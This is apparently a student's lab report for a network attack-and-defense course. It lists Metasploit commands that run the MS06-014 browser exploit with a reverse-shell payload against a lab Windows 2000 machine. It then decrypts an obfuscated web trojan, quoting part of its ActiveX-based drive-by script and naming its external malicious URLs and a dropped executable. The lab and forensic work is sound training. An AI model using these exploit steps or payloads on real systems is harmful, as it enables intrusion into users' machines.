20252808 2025-2026-2 《网络攻防实践》第十一次作业

20252808 2025-2026-2 《网络攻防实践》第十一次作业

一. 实验内容

1.1 实验内容概述

web浏览器渗透攻击

任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令

取证分析实践—网页木马攻击场景分析

实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/ 哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。

攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

1.2 实验相关知识概述

网络渗透攻击相关知识

Metasploit工具:一款强大的开源渗透测试框架,集成了大量渗透攻击模块、漏洞利用代码、载荷(Payload)等资源 。能帮助安全人员模拟攻击,发现系统安全漏洞,也会被攻击者用于非法入侵。
渗透攻击模块:如MS06 - 014渗透攻击模块,是针对特定软件漏洞编写的代码集合,可利用软件存在的安全缺陷实现对目标系统的攻击。
Payload(载荷):渗透攻击成功后在目标系统上执行的代码或指令集合,像实验中的远程Shell连接载荷,能让攻击者获取目标系统远程控制权,执行各种命令。

Web浏览器渗透攻击相关知识

Web浏览器漏洞利用:Web浏览器及其插件存在各种安全漏洞,攻击者利用这些漏洞构造恶意代码,当用户访问包含恶意代码的网页时,就可能导致浏览器被攻击,进而使攻击者控制用户计算机。
网页木马:嵌入在网页中的恶意脚本或程序,利用Web浏览器漏洞,在用户浏览网页时自动执行恶意操作,比如下载并执行恶意程序、窃取用户信息等。

取证分析相关知识

文件散列:如MD5散列,是一种将任意长度数据映射为固定长度摘要值的算法。在取证分析中,可用于唯一标识文件,验证文件完整性,以及通过散列值关联相关文件。
静态反汇编和动态调试:静态反汇编是将二进制程序代码转换为汇编代码进行分析,不实际运行程序,用于了解程序结构、功能等;动态调试则是在程序运行过程中进行调试分析,能观察程序运行时的变量值、执行流程等,有助于发现程序隐藏的恶意行为。

二. 实验过程

2.1 web浏览器渗透攻击实验

依次启动 Kali 攻击机虚拟机与 Windows 2000 靶机虚拟机,分别通过系统对应查询指令查看两台主机 IP 地址,确认 Kali 攻击机 IP 地址为192.168.200.2,Windows 2000 靶机 IP 地址为192.168.200.10。并且互相可以ping通!

image

image

image

输入命令msfconsole启动metasploit后输入命令search MS06-014,查询可用的攻击模块

image

image

输入命令use 0和命令show payloads查看可用的攻击载荷

image

输入命令set payload generic/shell_reverse_tcp用查到的可用的载荷进行反向tcp连接

image

输入命令 set RHOST 192.168.200.10 设置win2k虚拟机为靶机,输入命令 set LHOST 192.168.200.2 设置kali虚拟机为攻击机

image

输入exploit开始渗透攻击,得到网页木马链接为:http://192.168.200.2:8080/elNqcK

image

然后使用靶机win2k上的浏览器打开此链接,发现只有一段字符串

image

回到攻击机kali,输入sessions查看连接,发现攻击机kali与靶机win2k已经成功建立终端连接

image

输入命令sessions -i 1取得靶机控制权打开会话,输入ipconfig显示出了靶机win2k的ip信息,说明攻击成功

image

2.2 取证分析实践—网页木马攻击场景分析

从学习通下载start.html文件放置到Win2k虚拟机桌面,使用记事本打开该源码文件,检索关键词new09.htm,可检索到两处相关字段。由此可知start.html通过相对路径调用new09.htm,后续可采用同种方式打开new09.htm继续分析查看。

image

由于本地仅单独获取零散文件,并未搭建完整的网站目录结构,无法按照原始站点路径正常访问加载new09.htm。后续借助学习通内的 wp 配套文件补全该文件完整内容,该文件代码篇幅简短,核心仅包含两条外部恶意资源加载语句。打开new09.htm文件后,可发现页面内引入了两处外部网络链接,分别为http://aa.18dd.net/aa/kl.htm与 http://js.users.51.la/1299644.js

image

借助在线 MD5 哈希值计算平台,对上述两个网络地址分别进行哈希运算,最终得到对应的 MD5 值依次为:7F60672DCD6B5E90B6772545EE219BD3、23180A42A2FF1192150231B44FFDF3D3。

image

image

去hashed文件夹中寻找这两个MD5码为命名的文件。

7F60672DCD6B5E90B6772545EE219BD3文件:

image

23180A42A2FF1192150231B44FFDF3D3文件:

image

其中哈希值为7F60672DCD6B5E90B6772545EE219BD3的文件采用了 XXTEA+Base64 的加密方法,在倒数第三行找到密钥 ,第二个参数 \x73\x63\x72\x69\x70\x74 就是密钥,即"script":

image

image

image

23180A42A2FF1192150231B44FFDF3D3文件:

image

使用 XXTEA 在线解密工具,搭配已获取的密钥script对文件内密文执行解密操作,解密后得到十六进制格式数据。

image

得到十六进制文本:

将十六进制密文用在线转码工具转为字符后结果如下所示

image

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+246060*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("YnPiZwFAMARuwxsBqWz

可以发现js调用了document.location加载了 payload ,并且下一行中后面跟了一个可执行文件 PWJ.exe ,打开任务管理器,能够看到该进程在运行中,猜测应该是用来帮攻击机机获取靶机的控制权限。

image

通过查询可以得知BD96C556-65A3-11D0-983A-00C04FC29E36 是漏洞MS06-014中的clsid变量,所以可以得知攻击者是使用MS06-014这个漏洞进行攻击的。

三. 学习中遇到的问题及解决

问题1:在第一个实验中使用WinXP系统无法成功被攻击。

解决方案:查询资料后发现该系统中漏洞已被修复,选择更老版本的Windows系统,即Win2K虚拟机进行实验。

问题2:在取证分析实验中WinXP虚拟机将文件后缀改为zip后文件损坏不可解压。

解决方案:查询资料以及多次解决无果后改为使用kali虚拟机实验便可成功。

四. 学习感悟、思考

在本次实验,与前面实验不同之处在于此次实验进一步学习了渗透攻击等相关知识。
实验期间,我深入了解了什么是Web渗透攻击和Web木马以及蠕虫病毒等知识,并意识到网络安全隐患无处不在,在日常生活中不要随意点击不安全或不明白的Web网页。同时,此次实验遇到的问题很少很顺利完成实验,拓展了我在网络攻防技术领域的知识储备,让我明白在平时我们要小心访问Web页面,严防被渗透攻击或被木马入侵。

posted @ 2026-06-01 14:56  蒋乐乐  阅读(13)  评论(0)    收藏  举报